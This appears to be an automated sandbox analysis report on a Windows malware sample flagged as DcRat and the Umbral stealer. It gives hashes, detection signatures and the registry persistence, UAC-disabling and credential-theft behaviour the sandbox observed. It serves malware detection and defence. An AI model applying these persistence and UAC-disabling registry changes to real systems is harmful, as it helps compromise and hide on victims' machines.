Analysis
-
max time kernel
133s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
28-08-2024 15:18
Static task
static1
Behavioral task
behavioral1
Sample
8a23e0ccbd2027831ff07599f03b5c1324e080f9415983746de29a6c6ab695fc.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
8a23e0ccbd2027831ff07599f03b5c1324e080f9415983746de29a6c6ab695fc.exe
Resource
win10v2004-20240802-en
General
-
Target
8a23e0ccbd2027831ff07599f03b5c1324e080f9415983746de29a6c6ab695fc.exe
-
Size
1.5MB
-
MD5
31f61e9c68256b4cc089b3703c0e2039
-
SHA1
5ed8cecacc5e6165d43ee91787f72846d2e8ad01
-
SHA256
8a23e0ccbd2027831ff07599f03b5c1324e080f9415983746de29a6c6ab695fc
-
SHA512
ae48468132212e4756864fe7ce22d55c35d53cadd482aebabd62ec9d724ea3786879d9364563613140a43fa6c63a6c5cc1ee1775e4e0e9977aee3b748d8a6df1
-
SSDEEP
24576:yuDXTIGaPhEYzUzA0bOvbKAO1WMbkiSfLAo9Ffze20S4OIsAMWlXl9h2DvpfsTCu:1Djlabwz9Sv61kiQKvS4OUMI4hfaD
Malware Config
Signatures
-
DcRat 28 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process 1540 schtasks.exe 1604 schtasks.exe 1504 schtasks.exe 2196 schtasks.exe 1760 schtasks.exe 2032 schtasks.exe 1796 schtasks.exe 2300 schtasks.exe 2528 schtasks.exe 2688 schtasks.exe 796 schtasks.exe 2496 schtasks.exe 1744 schtasks.exe 2180 schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ratgergedrghi.exe 2572 schtasks.exe 1596 schtasks.exe 2556 schtasks.exe 992 schtasks.exe 1620 schtasks.exe 608 schtasks.exe 908 schtasks.exe 2988 schtasks.exe 1368 schtasks.exe 3024 schtasks.exe 1396 schtasks.exe 1856 schtasks.exe 2480 schtasks.exe -
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x000b00000001225f-6.dat family_umbral behavioral1/memory/2424-25-0x00000000002C0000-0x0000000000300000-memory.dmp family_umbral -
Modifies WinLogon for persistence 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\providerWinsessionruntimehost\\conhost.exe\", \"C:\\Windows\\SysWOW64\\lt-LT\\stealqqgwrffs.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\stealqqgwrffs.exe\", \"C:\\providerWinsessionruntimehost\\smss.exe\", \"C:\\providerWinsessionruntimehost\\csrss.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\providerWinsessionruntimehost\\conhost.exe\", \"C:\\Windows\\SysWOW64\\lt-LT\\stealqqgwrffs.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\stealqqgwrffs.exe\", \"C:\\providerWinsessionruntimehost\\smss.exe\", \"C:\\providerWinsessionruntimehost\\csrss.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\services.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\providerWinsessionruntimehost\\conhost.exe\", \"C:\\Windows\\SysWOW64\\lt-LT\\stealqqgwrffs.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\stealqqgwrffs.exe\", \"C:\\providerWinsessionruntimehost\\smss.exe\", \"C:\\providerWinsessionruntimehost\\csrss.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\services.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files\\Common Files\\explorer.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\providerWinsessionruntimehost\\conhost.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\providerWinsessionruntimehost\\conhost.exe\", \"C:\\Windows\\SysWOW64\\lt-LT\\stealqqgwrffs.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\providerWinsessionruntimehost\\conhost.exe\", \"C:\\Windows\\SysWOW64\\lt-LT\\stealqqgwrffs.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\stealqqgwrffs.exe\", \"C:\\providerWinsessionruntimehost\\smss.exe\", \"C:\\providerWinsessionruntimehost\\csrss.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\services.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\conhost.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\providerWinsessionruntimehost\\conhost.exe\", \"C:\\Windows\\SysWOW64\\lt-LT\\stealqqgwrffs.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\stealqqgwrffs.exe\", \"C:\\providerWinsessionruntimehost\\smss.exe\", \"C:\\providerWinsessionruntimehost\\csrss.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\services.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files\\Common Files\\explorer.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\lsass.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\providerWinsessionruntimehost\\conhost.exe\", \"C:\\Windows\\SysWOW64\\lt-LT\\stealqqgwrffs.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\stealqqgwrffs.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\providerWinsessionruntimehost\\conhost.exe\", \"C:\\Windows\\SysWOW64\\lt-LT\\stealqqgwrffs.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\stealqqgwrffs.exe\", \"C:\\providerWinsessionruntimehost\\smss.exe\"" Surrogatereviewsession.exe -
Process spawned unexpected child process 27 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1760 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2572 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2180 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1856 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 608 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3024 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2032 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1396 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 992 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1368 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2496 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 908 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2196 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1744 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1620 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1540 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1604 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1504 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2480 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1796 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1596 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2300 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2528 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2988 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2556 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2688 2608 schtasks.exe 35 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 796 2608 schtasks.exe 35 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Surrogatereviewsession.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Surrogatereviewsession.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" Surrogatereviewsession.exe -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
resource yara_rule behavioral1/files/0x0008000000017520-15.dat dcrat behavioral1/files/0x0006000000018741-41.dat dcrat behavioral1/memory/2936-43-0x0000000000990000-0x0000000000AD2000-memory.dmp dcrat behavioral1/memory/2004-117-0x0000000000130000-0x0000000000272000-memory.dmp dcrat -
pid Process 2976 powershell.exe 2092 powershell.exe 2276 powershell.exe 2648 powershell.exe -
Disables Task Manager via registry modification
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts stealqqgwrffs.exe -
Executes dropped EXE 4 IoCs
pid Process 2424 stealqqgwrffs.exe 2156 ratgergedrghi.exe 2936 Surrogatereviewsession.exe 2004 conhost.exe -
Loads dropped DLL 2 IoCs
pid Process 1108 cmd.exe 1108 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 18 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\providerWinsessionruntimehost\\conhost.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\services.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\conhost.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\stealqqgwrffs = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\stealqqgwrffs.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\stealqqgwrffs = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\stealqqgwrffs.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\services.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Program Files\\Common Files\\explorer.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\lsass.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\providerWinsessionruntimehost\\conhost.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\stealqqgwrffs = "\"C:\\Windows\\SysWOW64\\lt-LT\\stealqqgwrffs.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\providerWinsessionruntimehost\\smss.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\providerWinsessionruntimehost\\smss.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\providerWinsessionruntimehost\\csrss.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\providerWinsessionruntimehost\\csrss.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\conhost.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Program Files\\Common Files\\explorer.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\stealqqgwrffs = "\"C:\\Windows\\SysWOW64\\lt-LT\\stealqqgwrffs.exe\"" Surrogatereviewsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\lsass.exe\"" Surrogatereviewsession.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Surrogatereviewsession.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Surrogatereviewsession.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" conhost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 9 discord.com 10 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\SysWOW64\lt-LT\stealqqgwrffs.exe Surrogatereviewsession.exe File created C:\Windows\SysWOW64\lt-LT\ba9629384e3d1a Surrogatereviewsession.exe -
Drops file in Program Files directory 6 IoCs
description ioc Process File created C:\Program Files\Common Files\7a0fd90576e088 Surrogatereviewsession.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\lsass.exe Surrogatereviewsession.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\6203df4a6bafc7 Surrogatereviewsession.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\stealqqgwrffs.exe Surrogatereviewsession.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\ba9629384e3d1a Surrogatereviewsession.exe File created C:\Program Files\Common Files\explorer.exe Surrogatereviewsession.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ratgergedrghi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1328 cmd.exe 2356 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1784 wmic.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2156 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2356 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 27 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1620 schtasks.exe 2480 schtasks.exe 1760 schtasks.exe 2180 schtasks.exe 1396 schtasks.exe 2032 schtasks.exe 1604 schtasks.exe 2556 schtasks.exe 2572 schtasks.exe 908 schtasks.exe 1796 schtasks.exe 2688 schtasks.exe 3024 schtasks.exe 1744 schtasks.exe 1596 schtasks.exe 2528 schtasks.exe 1368 schtasks.exe 1504 schtasks.exe 2496 schtasks.exe 2196 schtasks.exe 1540 schtasks.exe 2300 schtasks.exe 2988 schtasks.exe 796 schtasks.exe 1856 schtasks.exe 608 schtasks.exe 992 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 2424 stealqqgwrffs.exe 2648 powershell.exe 2976 powershell.exe 2936 Surrogatereviewsession.exe 2936 Surrogatereviewsession.exe 2936 Surrogatereviewsession.exe 2092 powershell.exe 1788 powershell.exe 2936 Surrogatereviewsession.exe 2936 Surrogatereviewsession.exe 2276 powershell.exe 2004 conhost.exe 2004 conhost.exe 2004 conhost.exe 2004 conhost.exe 2004 conhost.exe 2004 conhost.exe 2004 conhost.exe 2004 conhost.exe 2004 conhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2004 conhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2424 stealqqgwrffs.exe Token: SeIncreaseQuotaPrivilege 2356 wmic.exe Token: SeSecurityPrivilege 2356 wmic.exe Token: SeTakeOwnershipPrivilege 2356 wmic.exe Token: SeLoadDriverPrivilege 2356 wmic.exe Token: SeSystemProfilePrivilege 2356 wmic.exe Token: SeSystemtimePrivilege 2356 wmic.exe Token: SeProfSingleProcessPrivilege 2356 wmic.exe Token: SeIncBasePriorityPrivilege 2356 wmic.exe Token: SeCreatePagefilePrivilege 2356 wmic.exe Token: SeBackupPrivilege 2356 wmic.exe Token: SeRestorePrivilege 2356 wmic.exe Token: SeShutdownPrivilege 2356 wmic.exe Token: SeDebugPrivilege 2356 wmic.exe Token: SeSystemEnvironmentPrivilege 2356 wmic.exe Token: SeRemoteShutdownPrivilege 2356 wmic.exe Token: SeUndockPrivilege 2356 wmic.exe Token: SeManageVolumePrivilege 2356 wmic.exe Token: 33 2356 wmic.exe Token: 34 2356 wmic.exe Token: 35 2356 wmic.exe Token: SeIncreaseQuotaPrivilege 2356 wmic.exe Token: SeSecurityPrivilege 2356 wmic.exe Token: SeTakeOwnershipPrivilege 2356 wmic.exe Token: SeLoadDriverPrivilege 2356 wmic.exe Token: SeSystemProfilePrivilege 2356 wmic.exe Token: SeSystemtimePrivilege 2356 wmic.exe Token: SeProfSingleProcessPrivilege 2356 wmic.exe Token: SeIncBasePriorityPrivilege 2356 wmic.exe Token: SeCreatePagefilePrivilege 2356 wmic.exe Token: SeBackupPrivilege 2356 wmic.exe Token: SeRestorePrivilege 2356 wmic.exe Token: SeShutdownPrivilege 2356 wmic.exe Token: SeDebugPrivilege 2356 wmic.exe Token: SeSystemEnvironmentPrivilege 2356 wmic.exe Token: SeRemoteShutdownPrivilege 2356 wmic.exe Token: SeUndockPrivilege 2356 wmic.exe Token: SeManageVolumePrivilege 2356 wmic.exe Token: 33 2356 wmic.exe Token: 34 2356 wmic.exe Token: 35 2356 wmic.exe Token: SeDebugPrivilege 2648 powershell.exe Token: SeDebugPrivilege 2976 powershell.exe Token: SeDebugPrivilege 2936 Surrogatereviewsession.exe Token: SeDebugPrivilege 2092 powershell.exe Token: SeDebugPrivilege 1788 powershell.exe Token: SeIncreaseQuotaPrivilege 2604 wmic.exe Token: SeSecurityPrivilege 2604 wmic.exe Token: SeTakeOwnershipPrivilege 2604 wmic.exe Token: SeLoadDriverPrivilege 2604 wmic.exe Token: SeSystemProfilePrivilege 2604 wmic.exe Token: SeSystemtimePrivilege 2604 wmic.exe Token: SeProfSingleProcessPrivilege 2604 wmic.exe Token: SeIncBasePriorityPrivilege 2604 wmic.exe Token: SeCreatePagefilePrivilege 2604 wmic.exe Token: SeBackupPrivilege 2604 wmic.exe Token: SeRestorePrivilege 2604 wmic.exe Token: SeShutdownPrivilege 2604 wmic.exe Token: SeDebugPrivilege 2604 wmic.exe Token: SeSystemEnvironmentPrivilege 2604 wmic.exe Token: SeRemoteShutdownPrivilege 2604 wmic.exe Token: SeUndockPrivilege 2604 wmic.exe Token: SeManageVolumePrivilege 2604 wmic.exe Token: 33 2604 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2372 wrote to memory of 2424 2372 8a23e0ccbd2027831ff07599f03b5c1324e080f9415983746de29a6c6ab695fc.exe 30 PID 2372 wrote to memory of 2424 2372 8a23e0ccbd2027831ff07599f03b5c1324e080f9415983746de29a6c6ab695fc.exe 30 PID 2372 wrote to memory of 2424 2372 8a23e0ccbd2027831ff07599f03b5c1324e080f9415983746de29a6c6ab695fc.exe 30 PID 2372 wrote to memory of 2156 2372 8a23e0ccbd2027831ff07599f03b5c1324e080f9415983746de29a6c6ab695fc.exe 31 PID 2372 wrote to memory of 2156 2372 8a23e0ccbd2027831ff07599f03b5c1324e080f9415983746de29a6c6ab695fc.exe 31 PID 2372 wrote to memory of 2156 2372 8a23e0ccbd2027831ff07599f03b5c1324e080f9415983746de29a6c6ab695fc.exe 31 PID 2372 wrote to memory of 2156 2372 8a23e0ccbd2027831ff07599f03b5c1324e080f9415983746de29a6c6ab695fc.exe 31 PID 2156 wrote to memory of 3012 2156 ratgergedrghi.exe 32 PID 2156 wrote to memory of 3012 2156 ratgergedrghi.exe 32 PID 2156 wrote to memory of 3012 2156 ratgergedrghi.exe 32 PID 2156 wrote to memory of 3012 2156 ratgergedrghi.exe 32 PID 2424 wrote to memory of 2356 2424 stealqqgwrffs.exe 33 PID 2424 wrote to memory of 2356 2424 stealqqgwrffs.exe 33 PID 2424 wrote to memory of 2356 2424 stealqqgwrffs.exe 33 PID 2424 wrote to memory of 2720 2424 stealqqgwrffs.exe 36 PID 2424 wrote to memory of 2720 2424 stealqqgwrffs.exe 36 PID 2424 wrote to memory of 2720 2424 stealqqgwrffs.exe 36 PID 2424 wrote to memory of 2648 2424 stealqqgwrffs.exe 38 PID 2424 wrote to memory of 2648 2424 stealqqgwrffs.exe 38 PID 2424 wrote to memory of 2648 2424 stealqqgwrffs.exe 38 PID 3012 wrote to memory of 1108 3012 WScript.exe 40 PID 3012 wrote to memory of 1108 3012 WScript.exe 40 PID 3012 wrote to memory of 1108 3012 WScript.exe 40 PID 3012 wrote to memory of 1108 3012 WScript.exe 40 PID 1108 wrote to memory of 2936 1108 cmd.exe 42 PID 1108 wrote to memory of 2936 1108 cmd.exe 42 PID 1108 wrote to memory of 2936 1108 cmd.exe 42 PID 1108 wrote to memory of 2936 1108 cmd.exe 42 PID 2424 wrote to memory of 2976 2424 stealqqgwrffs.exe 43 PID 2424 wrote to memory of 2976 2424 stealqqgwrffs.exe 43 PID 2424 wrote to memory of 2976 2424 stealqqgwrffs.exe 43 PID 2424 wrote to memory of 2092 2424 stealqqgwrffs.exe 46 PID 2424 wrote to memory of 2092 2424 stealqqgwrffs.exe 46 PID 2424 wrote to memory of 2092 2424 stealqqgwrffs.exe 46 PID 2424 wrote to memory of 1788 2424 stealqqgwrffs.exe 59 PID 2424 wrote to memory of 1788 2424 stealqqgwrffs.exe 59 PID 2424 wrote to memory of 1788 2424 stealqqgwrffs.exe 59 PID 2936 wrote to memory of 2868 2936 Surrogatereviewsession.exe 76 PID 2936 wrote to memory of 2868 2936 Surrogatereviewsession.exe 76 PID 2936 wrote to memory of 2868 2936 Surrogatereviewsession.exe 76 PID 1108 wrote to memory of 2156 1108 cmd.exe 78 PID 1108 wrote to memory of 2156 1108 cmd.exe 78 PID 1108 wrote to memory of 2156 1108 cmd.exe 78 PID 1108 wrote to memory of 2156 1108 cmd.exe 78 PID 2868 wrote to memory of 2684 2868 cmd.exe 79 PID 2868 wrote to memory of 2684 2868 cmd.exe 79 PID 2868 wrote to memory of 2684 2868 cmd.exe 79 PID 2424 wrote to memory of 2604 2424 stealqqgwrffs.exe 80 PID 2424 wrote to memory of 2604 2424 stealqqgwrffs.exe 80 PID 2424 wrote to memory of 2604 2424 stealqqgwrffs.exe 80 PID 2424 wrote to memory of 1520 2424 stealqqgwrffs.exe 83 PID 2424 wrote to memory of 1520 2424 stealqqgwrffs.exe 83 PID 2424 wrote to memory of 1520 2424 stealqqgwrffs.exe 83 PID 2424 wrote to memory of 3012 2424 stealqqgwrffs.exe 85 PID 2424 wrote to memory of 3012 2424 stealqqgwrffs.exe 85 PID 2424 wrote to memory of 3012 2424 stealqqgwrffs.exe 85 PID 2424 wrote to memory of 2276 2424 stealqqgwrffs.exe 87 PID 2424 wrote to memory of 2276 2424 stealqqgwrffs.exe 87 PID 2424 wrote to memory of 2276 2424 stealqqgwrffs.exe 87 PID 2424 wrote to memory of 1784 2424 stealqqgwrffs.exe 89 PID 2424 wrote to memory of 1784 2424 stealqqgwrffs.exe 89 PID 2424 wrote to memory of 1784 2424 stealqqgwrffs.exe 89 PID 2424 wrote to memory of 1328 2424 stealqqgwrffs.exe 91 PID 2424 wrote to memory of 1328 2424 stealqqgwrffs.exe 91 -
System policy modification 1 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Surrogatereviewsession.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Surrogatereviewsession.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" Surrogatereviewsession.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" conhost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2720 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8a23e0ccbd2027831ff07599f03b5c1324e080f9415983746de29a6c6ab695fc.exe"C:\Users\Admin\AppData\Local\Temp\8a23e0ccbd2027831ff07599f03b5c1324e080f9415983746de29a6c6ab695fc.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2372 -
